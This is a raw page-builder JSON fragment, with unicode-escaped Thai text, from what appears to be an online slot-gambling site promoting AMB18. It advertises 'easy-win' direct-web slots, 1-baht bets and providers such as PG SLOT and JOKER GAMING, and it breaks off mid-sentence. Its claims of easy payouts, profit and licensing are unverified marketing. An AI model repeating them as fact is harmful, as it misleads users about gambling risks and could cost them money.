\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 1 \\u0e1a\\u0e32\\u0e17 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 \\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e1b\\u0e35\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01 \\u0e27\\u0e34\\u0e14\\u0e35\\u0e42\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29<\\/span><span style=\\\"font-weight: 400;\\\">\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 <\\/span><\\/p><p><span style=\\\"font-weight: 400;\\\">\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e32\\u0e27\\u0e1a\\u0e2d\\u0e22\\u0e2a\\u0e38\\u0e14\\u0e14\\u0e38\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e14 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e2a\\u0e23\\u0e23\\u0e08\\u0e32\\u0e01\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e43\\u0e1a\\u0e2d\\u0e19\\u0e38\\u0e0d\\u0e32\\u0e15\\u0e16\\u0e39\\u0e01\\u0e15\\u0e49\\u0e2d\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e15\\u0e34\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e47\\u0e27\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e17\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e19\\u0e47\\u0e15\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-3-1-1.webp\",\"id\":353,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e2a\\u0e38\\u0e14\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14 \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e32\\u0e22\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e38\\u0e14\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32<\\/span> <span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e27\\u0e1a\\u0e23\\u0e27\\u0e21\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e08\\u0e32\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e21\\u0e32\\u0e44\\u0e27\\u0e49\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e38\\u0e48\\u0e19\\u0e27\\u0e32\\u0e22 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22 \\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e08\\u0e31\\u0e14\\u0e08\\u0e49\\u0e32\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e16\\u0e35\\u0e48 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e0b\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e40\\u0e27\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e27\\u0e2d\\u0e23\\u0e4c\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e17\\u0e35\\u0e48\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e08\\u0e36\\u0e07\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"933afcf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 PG SLOT<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e43\\u0e19\\u0e04\\u0e48\\u0e32\\u0e22\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e17\\u0e35\\u0e48\\u0e02\\u0e32\\u0e14\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e04\\u0e37\\u0e2d PG SLOT \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e2d\\u0e25\\u0e31\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e21\\u0e35\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e41\\u0e25\\u0e30\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e15\\u0e38\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e14\\u0e38\\u0e25 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e16\\u0e36\\u0e07\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e08\\u0e36\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e43\\u0e19\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e41\\u0e25\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 JOKER GAMING<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">JOKER GAMING \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e08\\u0e31\\u0e01\\u0e01\\u0e31\\u0e19\\u0e14\\u0e35\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e18\\u0e35\\u0e21\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e41\\u0e19\\u0e27\\u0e40\\u0e2d\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e15\\u0e30\\u0e27\\u0e31\\u0e19\\u0e15\\u0e01\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e19\\u0e40\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e20\\u0e32\\u0e1e \\u0e20\\u0e32\\u0e1e\\u0e44\\u0e21\\u0e48\\u0e01\\u0e23\\u0e30\\u0e15\\u0e38\\u0e01 \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e23\\u0e34\\u0e21\\u0e17\\u0e31\\u0e1e \\u0e08\\u0e36\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e23\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e25\\u0e38\\u0e49\\u0e19\\u0e01\\u0e33\\u0e44\\u0e23\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 JILI SLOT<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">JILI SLOT 